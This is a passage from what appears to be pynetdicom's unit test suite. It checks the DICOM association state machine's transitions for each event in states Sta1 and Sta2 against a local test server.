("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
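# How the two tables above are used (summary of the tests below):
# REFERENCE_BAD_EVENTS drives test_invalid_action_raises, which checks that
# StateMachine.do_action() raises InvalidEventError for every (event, state)
# pair the state table forbids, while REFERENCE_GOOD_EVENTS drives
# test_exception_during_action, which checks that a failure inside a *valid*
# action kills the DUL instead of being swallowed.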
class BadDUL:
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine:
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
@pytest.mark.parametrize("event, states", REFERENCE_BAD_EVENTS)
def test_invalid_action_raises(self, event, states):
"""Test StateMachine.do_action raises exception if action invalid."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for state in states:
state = "Sta{}".format(state)
fsm.current_state = state
msg = (
r"Invalid event '{}' for the current state '{}'"
.format(event, state)
)
with pytest.raises(InvalidEventError, match=msg):
fsm.do_action(event)
@pytest.mark.parametrize("event, states", REFERENCE_GOOD_EVENTS)
def test_exception_during_action(self, event, states):
"""Test an exception raised during an action kill the DUL."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
fsm.dul = BadDUL()
for state in states:
fsm.dul.is_killed = False
state = "Sta{}".format(state)
fsm.current_state = state
with pytest.raises(AttributeError):
fsm.do_action(event)
assert fsm.dul.is_killed is True
assert fsm.current_state == state
class TestStateBase:
"""Base class for State tests."""
def setup(self):
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.scp = None
def teardown(self):
if self.scp:
for commands in self.scp.commands:
self.scp.step()
#self.scp.commands = [('exit', None)]
#self.scp.step()
self.scp.shutdown()
def get_associate(self, assoc_type):
primitive = A_ASSOCIATE()
if assoc_type == 'request':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.calling_presentation_address = ('', 0)
# The TCP/IP address of the destination, pynetdicom includes port too
primitive.called_presentation_address = ('localhost', 11112)
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16382
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'accept':
primitive.application_context_name = '1.2.3.4.5.6'
# Calling AE Title is the source DICOM AE title
primitive.calling_ae_title = b'LOCAL_AE_TITLE '
# Called AE Title is the destination DICOM AE title
primitive.called_ae_title = b'REMOTE_AE_TITLE '
# The TCP/IP address of the source, pynetdicom includes port too
primitive.result = 0x00
primitive.result_source = 0x01
# Proposed presentation contexts
cx = build_context(VerificationSOPClass)
cx.context_id = 1
primitive.presentation_context_definition_results_list = [cx]
user_info = []
item = MaximumLengthNotification()
item.maximum_length_received = 16383
user_info.append(item)
item = ImplementationClassUIDNotification()
item.implementation_class_uid = '1.2.3.4.5'
user_info.append(item)
primitive.user_information = user_info
elif assoc_type == 'reject':
primitive.result = 0x01
primitive.result_source = 0x01
primitive.diagnostic = 0x01
return primitive
def get_release(self, is_response=False):
primitive = A_RELEASE()
if is_response:
primitive.result = 'affirmative'
return primitive
def get_abort(self, is_ap=False):
if is_ap:
primitive = A_P_ABORT()
primitive.provider_reason = 0x00
else:
primitive = A_ABORT()
primitive.abort_source = 0x00
return primitive
def get_pdata(self):
item = [1, p_data_tf[10:]]
primitive = P_DATA()
primitive.presentation_data_value_list.append(item)
return primitive
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm._events = []
fsm.original_action = fsm.do_action
def do_action(event):
fsm._events.append(event)
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(('localhost', 11112), commands)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def print_fsm_scp(self, fsm, scp=None):
"""Print out some of the quantities we're interested in."""
print('Transitions', fsm._transitions)
print('Changes')
for change in fsm._changes:
print('\t{}'.format(change))
print('Events', fsm._events)
if scp and scp.handlers:
print('Received', scp.handlers[0].received)
print('Sent', scp.handlers[0].sent)
def get_acceptor_assoc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
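        # 1 s receive timeout: SO_RCVTIMEO takes a struct timeval
        # (seconds, microseconds), packed here as two C longs (Linux layout)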
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_RCVTIMEO,
pack('ll', 1, 0)
)
sock.connect(('localhost', 11112))
ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='acceptor')
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
fsm = self.monkey_patch(assoc.dul.state_machine)
return assoc, fsm
def wait_on_state(self, fsm, state, timeout=5):
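        # Poll in 50 ms steps until the FSM reaches `state` or `timeout`
        # seconds have elapsed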
start = 0
while fsm.current_state != state and start < timeout:
time.sleep(0.05)
start += 0.05
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState01(TestStateBase):
"""Tests for State 01: Idle."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta1')
def test_evt01(self):
"""Test Sta1 + Evt1."""
# Sta1 + Evt1 -> AE-1 -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
# AE-1: Issue TRANSPORT_CONNECT primitive to <transport service>
commands = [
('recv', None),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:1] == ['Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta1 + Evt2."""
# Sta1 + Evt2 -> <ignore> -> Sta1
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta1 + Evt3."""
# Sta1 + Evt3 -> <ignore> -> Sta1
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt3']
def test_evt04(self):
"""Test Sta1 + Evt4."""
# Sta1 + Evt4 -> <ignore> -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta1 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta1 + Evt6."""
# Sta1 + Evt6 -> <ignore> -> Sta1
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt6']
def test_evt07(self):
"""Test Sta1 + Evt7."""
# Sta1 + Evt7 -> <ignore> -> Sta1
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt7'
def test_evt08(self):
"""Test Sta1 + Evt8."""
# Sta1 + Evt8 -> <ignore> -> Sta1
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt8'
assert self.fsm.current_state == 'Sta1'
def test_evt09(self):
"""Test Sta1 + Evt9."""
# Sta1 + Evt9 -> <ignore> -> Sta1
# Evt9: Receive P-DATA primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt9'
assert self.fsm.current_state == 'Sta1'
def test_evt10(self):
"""Test Sta1 + Evt10."""
# Sta1 + Evt10 -> <ignore> -> Sta1
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt10']
def test_evt11(self):
"""Test Sta1 + Evt11."""
# Sta1 + Evt11 -> <ignore> -> Sta1
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt11'
assert self.fsm.current_state == 'Sta1'
def test_evt12(self):
"""Test Sta1 + Evt12."""
# Sta1 + Evt12 -> <ignore> -> Sta1
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt12']
def test_evt13(self):
"""Test Sta1 + Evt13."""
# Sta1 + Evt13 -> <ignore> -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt13']
def test_evt14(self):
"""Test Sta1 + Evt14."""
# Sta1 + Evt14 -> <ignore> -> Sta1
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt14'
assert self.fsm.current_state == 'Sta1'
def test_evt15(self):
"""Test Sta1 + Evt15."""
# Sta1 + Evt15 -> <ignore> -> Sta1
# Evt15: Receive A-ABORT (rq) primitive from <local user>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.send_pdu(self.get_abort(False))
time.sleep(0.5)
self.assoc.kill()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt15'
assert self.fsm.current_state == 'Sta1'
def test_evt16(self):
"""Test Sta1 + Evt16."""
# Sta1 + Evt16 -> <ignore> -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt16']
def test_evt17(self):
"""Test Sta1 + Evt17."""
# Sta1 + Evt17 -> <ignore> -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt17']
def test_evt18(self):
"""Test Sta1 + Evt18."""
# Sta1 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
self.assoc._mode = "acceptor"
self.assoc.start()
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
self.assoc.kill()
assert self.assoc.dul.artim_timer.expired
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[0] == 'Evt18'
assert self.fsm.current_state == 'Sta1'
def test_evt19(self):
"""Test Sta1 + Evt19."""
# Sta1 + Evt19 -> <ignore> -> Sta1
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc._mode = "acceptor"
self.move_to_state(self.assoc, scp)
self.assoc.dul.socket.socket.connect(('localhost', 11112))
self.assoc.dul.socket._is_connected = True
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions == []
assert self.fsm._changes == []
assert self.fsm._events[:1] == ['Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState02(TestStateBase):
"""Tests for State 02: Connection open, waiting for A-ASSOCIATE-RQ."""
def move_to_state(self, assoc, scp):
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta2')
def test_evt01(self):
"""Test Sta2 + Evt1."""
# Sta2 + Evt1 -> <ignore> -> Sta2
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta2 + Evt2."""
# Sta2 + Evt2 -> <ignore> -> Sta2
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta2 + Evt3."""
# Sta2 + Evt3 -> AA-1 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt3', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt3']
def test_evt04(self):
"""Test Sta2 + Evt4."""
# Sta2 + Evt4 -> AA-1 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rj),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt4', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta2 + Evt5."""
# Sta2 + Evt5 -> <ignore> -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06a(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> **Sta3** or Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
commands = [
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt06b(self):
"""Test Sta2 + Evt6."""
# Sta2 + Evt6 -> AE-6 -> Sta3 or **Sta13**
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AE-6: Stop ARTIM, issue A-ASSOCIATE or A-ASSOCIATE-RJ PDU
bad_request = a_associate_rq[:6] + b'\x00\x02' + a_associate_rq[8:]
assert len(bad_request) == len(a_associate_rq)
commands = [
('send', bad_request),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:2] == ['Evt5', 'Evt6']
def test_evt07(self):
"""Test Sta2 + Evt7."""
# Sta2 + Evt7 -> <ignore> -> Sta2
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt7']
def test_evt08(self):
"""Test Sta2 + Evt8."""
# Sta2 + Evt8 -> <ignore> -> Sta2
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt8']
def test_evt09(self):
"""Test Sta2 + Evt9."""
# Sta2 + Evt9 -> <ignore> -> Sta2
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt9']
def test_evt10(self):
"""Test Sta2 + Evt10."""
# Sta2 + Evt10 -> AA-1 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', p_data_tf),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt10', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt10']
def test_evt11(self):
"""Test Sta2 + Evt11."""
# Sta2 + Evt11 -> <ignore> -> Sta2
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt11']
def test_evt12(self):
"""Test Sta2 + Evt12."""
# Sta2 + Evt12 -> AA-1 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt12', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt12']
def test_evt13(self):
"""Test Sta2 + Evt13."""
# Sta2 + Evt13 -> AA-1 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt13', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt13']
def test_evt14(self):
"""Test Sta2 + Evt14."""
# Sta2 + Evt14 -> <ignore> -> Sta2
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt14']
def test_evt15(self):
"""Test Sta2 + Evt15."""
# Sta2 + Evt15 -> <ignore> -> Sta2
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt15']
def test_evt16(self):
"""Test Sta2 + Evt16."""
# Sta2 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt16', 'AA-2')
]
assert fsm._events[:2] == ['Evt5', 'Evt16']
def test_evt17(self):
"""Test Sta2 + Evt17."""
# Sta2 + Evt17 -> AA-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-5: Stop ARTIM timer
commands = [
('exit', None)
]
